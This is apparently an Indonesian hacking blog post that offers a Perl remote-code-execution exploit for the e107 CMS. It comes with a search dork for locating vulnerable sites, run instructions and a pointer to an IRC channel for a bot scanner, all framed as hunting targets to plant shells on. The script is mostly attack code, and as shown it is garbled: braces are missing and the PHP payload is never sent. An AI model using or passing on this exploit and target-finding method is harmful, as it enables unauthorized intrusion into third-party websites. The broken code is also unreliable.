Selasa, 02 Juli 2013

e107 Remote Code Execution + Scanner

Hallo Semua, Kembali Lagi Dengan Mencari Target Shell. Banyak Yang Minta Target Di Channel, Tapi So Far It’s OK lah :) Yuk nyari target dengan e107 bug dork. Jangan lupa install perl di komputer anda / server anda / shell anda (PENTING). Berikut ini adalah Exploitnya, copy dan simpan di file bernama: “ Exploit Title: e107 Code Exec
# Date: 05/22/10
# Author:
# Software Link:
# Version: e107 <= 0.7.20
# Tested on: Linux/Windows
#!/usr/bin/perl -w
# e107 Code Exec // SploitAuthor:
# These scrubs still haven't released an update!
# Here is a little bit of motivation for them to
# patch one of the most popular, and insecure of
# the PHP web apps available today.
# DORK: inurl:e107_plugins
use LWP::UserAgent;
my $path = $ARGV[0] or die("Gunakan Perintah: perl http://e107site/pathto/contact.php\n");
my $load = 'passthru(chr(105).chr(100))'; # Simple 'id' command. Put ur PHP payload here!
# Remove comment for proxy support
my $proxy = '';
$ENV{http_proxy} = $proxy ? $proxy: 0;
$ua = new LWP::UserAgent;
if ( $proxy )
print "[*] Using proxy $proxy \n";
my $req = new HTTP::Request POST => $path;
my $res = $ua->request($req);
my $data = $res->as_string;
if ( $data =~ /<td class=["']main_section['"]>(.*)/ )
$data = $1;
print "$data\n";
print "$data\n";
Setelah code tersebut dibuat, maka jalankan di directory active run perl shell / command prompt anda dengan dengan perintah: perl
Adapun Cara Lain Manual Bisa Dilihat (Video) Berikut:
Lihat Videonya Disini: HERE
Download it: HERE
Cara Lebih Mudah Lagi Dengan Menjalankan BOT SCANNER: Silakan Kunjungi #BINUSHACKER di IRC.DAL.NET untuk lebih detailnya & Tanyakan Langsung Ke Staff Yang Sedang Online.
Source Instant Download Bot Scanner:

Selamat menikmati & semoga berhasil :)

0 komentar:

Posting Komentar